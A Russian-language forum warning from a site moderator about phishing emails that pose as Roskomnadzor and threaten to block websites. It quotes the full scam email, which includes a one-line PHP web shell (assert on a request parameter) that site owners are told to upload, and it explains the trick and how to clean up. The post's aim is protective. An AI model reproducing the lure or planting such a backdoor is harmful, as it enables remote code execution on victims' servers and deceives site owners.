• Форумы
  •   
  • О сайте
  • Мошенничество с угрозой блокировки под видом Роскомнадзора
  •   
Автор
Тема

Модератор / Гуру
Мошенничество с угрозой блокировки под видом Роскомнадзора
Внимание всем, у кого есть сайт!
Хотим , от лица разработчиков этого портала, уведомить Вас, что в последнее время мы стали встречаться со случаями отправки на электронные адреса сообщений мошенниками ПОД ВИДОМ РОСКОМНАДЗОРА.


Обман заключается в том, что пользователю под угрозой блокировки предлагают создать файл на первый взгляд с безобидным php кодом. Однако, если посмотреть описание функции "assert", то сразу станет ясно, что злоумышленники просто выполнят код, который будет указан в переменной "roskomnadzor".

Мошенники отправляют письма с адреса - zapret-info@roskomnadzor.org
При переходе на сайт roskomnadzor.org происходит перенаправление на сайт Роскомнадзора - rkn.gov.ru

Письма приходят следующего содержания (текст может изменяться!):
-----------------------------------------------------------------------
Здравствуйте.

Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени (тут пишут адрес вашего сайта) в сети «Интернет».

В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 21618/2015, Ваш сайт (адрес вашего сайта) был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени (адрес вашего сайта), Вам необходимо:

1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:

< ?php
/*Подтверждение доменного имени (тут они пишут адрес вашего сайта)*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>

*В < ?php необходимо убрать пробел между < и ?php

Путь до файла на Вашем сайте должен получиться следующий: (тут пишут адрес вашего сайта)/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени (тут пишут адрес вашего сайта), следую инструкции указанной выше, то Ваш сайт (тут пишут адрес вашего сайта) будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.

— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
-----------------------------------------------------------------------

Если Вы уже произвели какие-либо действия по такому письму, настоятельно рекомендуем удалить данный файл и проверить, не были ли внесены несанкционированные изменения в Ваш код.

Подтверждение владельца домена осуществляется через регистратора домена и не требует внесения какого-либо кода на сервер, просим Вас быть внимательными к таким вещам!

О данной рассылке указано на сайте Роскомнадзора
Также подробный разбор фишингового письма Вы можете прочитать на популярном информационном IT-портале

Если у Вас есть вопросы, можете обратиться в нашу службу поддержки по телефону (4862)55-20-03. 
Всякий раз, когда вы обнаруживаете себя на стороне большинства, — время остановиться и задуматься. #666590
  • Форумы
  • О сайте
  • Мошенничество с угрозой блокировки под видом Роскомнадзора

Популярное
на форуме

Отзывы о ресторанах18+


Вход
Регистрация
Отправляя заявку, вы соглашаетесь с условиями
политики конфиденциальности
Восстановление пароля

Пожаловаться